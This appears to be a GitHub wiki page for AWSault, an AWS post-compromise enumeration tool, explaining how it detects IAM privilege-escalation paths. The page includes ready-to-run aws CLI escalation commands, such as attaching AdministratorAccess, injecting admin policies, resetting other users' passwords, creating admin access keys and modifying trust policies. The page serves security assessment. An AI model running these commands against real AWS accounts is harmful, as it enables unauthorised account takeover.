Privilege Escalation - baeziy/AWSault GitHub Wiki

Privilege Escalation Detection

AWSault detects 14 known IAM privilege escalation techniques by scanning all discovered policies — both on your direct identity and on roles you can assume.

How detection works

After building the full identity permission map (see Identity Recon), AWSault:

  1. Collects all policy statements from:
    • Your direct policies (inline, attached, group-inherited)
    • Policies on roles you can assume
  2. For each Allow statement, checks if any action matches a known privesc technique
  3. Supports wildcard matching (e.g., iam:* matches all IAM privesc actions)
  4. Deduplicates findings (same technique + same policy + same role = one finding)
  5. Sorts by severity (CRITICAL first)
  6. For SetDefaultPolicyVersion, also collects the actual alternate policy versions

Detected techniques

CRITICAL severity

# Action Name Description
1 iam:CreatePolicyVersion Policy Version Injection Create a new policy version with arbitrary permissions and set it as default
2 iam:AttachUserPolicy User Policy Attachment Attach any managed policy (e.g., AdministratorAccess) to a user
3 iam:AttachRolePolicy Role Policy Attachment Attach any managed policy to a role you can assume
4 iam:AttachGroupPolicy Group Policy Attachment Attach any managed policy to a group you belong to
5 iam:PutUserPolicy User Inline Policy Injection Create an inline policy with arbitrary permissions on a user
6 iam:PutRolePolicy Role Inline Policy Injection Create an inline policy on a role
7 iam:PutGroupPolicy Group Inline Policy Injection Create an inline policy on a group
8 iam:UpdateAssumeRolePolicy Trust Policy Modification Modify a role's trust policy to allow your identity to assume it

HIGH severity

# Action Name Description
9 iam:SetDefaultPolicyVersion Policy Version Rollback Switch a managed policy to an older version that may have more permissions
10 iam:AddUserToGroup Group Membership Escalation Add yourself to a group with higher privileges (e.g., Admins)
11 iam:CreateLoginProfile Console Access Creation Create console login credentials for any user
12 iam:UpdateLoginProfile Console Password Change Change the console password of any user
13 iam:CreateAccessKey Access Key Creation Generate programmatic access keys for any user
14 iam:PassRole Role Passing Pass a high-privilege role to an AWS service (Lambda, EC2, etc.) and execute code as that role

Detailed technique breakdowns

1. Policy Version Rollback (SetDefaultPolicyVersion)

Severity: HIGH

AWS managed and customer-managed policies can have up to 5 versions. Only the "default" version is active. If you have iam:SetDefaultPolicyVersion, you can switch to any existing version.

AWSault's approach:

  • Enumerates all versions of every managed policy on your identity via list_policy_versions
  • Fetches the full document of each non-default version via get_policy_version
  • Displays the statements in each alternate version so you can see which one has more permissions
  • Generates the exact aws CLI command to switch

Example output:

HIGH  Policy Version Rollback
      Switch managed policy to older version with more permissions
      action: iam:SetDefaultPolicyVersion (in policy 'DevPolicy')

      Available policy versions to switch to:
        ■ DevPolicy version v1
            Allow: s3:*, iam:*, ec2:*, lambda:*
              → *

Escalation command:

aws iam set-default-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --version-id v1

2. Policy Version Injection (CreatePolicyVersion)

Severity: CRITICAL

Create a new version of a managed policy with Action: *, Resource: * and set it as the default.

Escalation command:

aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/MyPolicy \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' \
  --set-as-default

3. User/Role/Group Policy Attachment

Severity: CRITICAL

Attach AdministratorAccess (or any other policy) to a user, role, or group.

Escalation commands:

# attach to user
aws iam attach-user-policy \
  --user-name target-user \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# attach to role
aws iam attach-role-policy \
  --role-name target-role \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# attach to group
aws iam attach-group-policy \
  --group-name target-group \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

4. Inline Policy Injection

Severity: CRITICAL

Create an inline policy with full admin permissions on a user, role, or group.

Escalation commands:

# on user
aws iam put-user-policy \
  --user-name target-user \
  --policy-name admin \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'

# on role
aws iam put-role-policy \
  --role-name target-role \
  --policy-name admin \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'

5. Group Membership Escalation (AddUserToGroup)

Severity: HIGH

Add your user to a group that has admin or higher-privilege policies.

aws iam add-user-to-group --user-name your-user --group-name Admins

6. Console Access Manipulation

Severity: HIGH

Create or change console passwords for other users, then log in as them.

# create login for user without console access
aws iam create-login-profile --user-name target-user --password 'P@ssw0rd123!'

# change existing password
aws iam update-login-profile --user-name target-user --password 'P@ssw0rd123!'

7. Access Key Creation (CreateAccessKey)

Severity: HIGH

Generate programmatic access keys for any user, including admin users.

aws iam create-access-key --user-name admin-user

8. Trust Policy Modification (UpdateAssumeRolePolicy)

Severity: CRITICAL

Modify a role's trust policy so your identity can assume it.

aws iam update-assume-role-policy \
  --role-name high-priv-role \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::123456789012:user/your-user"},"Action":"sts:AssumeRole"}]}'

9. Role Passing (PassRole)

Severity: HIGH

Pass a high-privilege role to a service you control (e.g., create a Lambda function that runs as an admin role).

# create lambda with admin role
aws lambda create-function \
  --function-name escalate \
  --runtime python3.9 \
  --role arn:aws:iam::123456789012:role/admin-role \
  --handler index.handler \
  --zip-file fileb://function.zip

Output

Terminal

Privesc paths are displayed prominently with a red banner:

  PRIVILEGE ESCALATION PATHS (3)

    CRITICAL  Policy Version Injection
      Create a new policy version with arbitrary permissions
      action: iam:CreatePolicyVersion (in policy 'DevPolicy')

    HIGH  Policy Version Rollback (via role dev-role)
      Switch managed policy to older version with more permissions
      action: iam:SetDefaultPolicyVersion (in policy 'DevPolicy')

HTML report

Shown in the Recon tab with severity badges, collapsible details, and alternate version statements.

CSV export

Flat rows with severity, name, action, via_policy, via_role, resources, and description.

JSON export

Structured data under recon.PrivescPaths.

Wildcard matching

AWSault handles IAM wildcard patterns correctly:

  • iam:* matches all 14 privesc actions
  • iam:Create* matches CreatePolicyVersion, CreateLoginProfile, CreateAccessKey
  • * matches everything
  • Matching is case-insensitive for the action portion

Via assumable roles

Privesc paths found through assumable roles are tagged with (via role <role-name>). This means:

  1. First assume the role: aws sts assume-role --role-arn <arn> --role-session-name x
  2. Then execute the escalation command with the temporary credentials

AWSault — AWS Post-Compromise Enumeration Tool | Created by baeziy | Report Issues | GPL-3.0

⚠️ **GitHub.com Fallback** ⚠️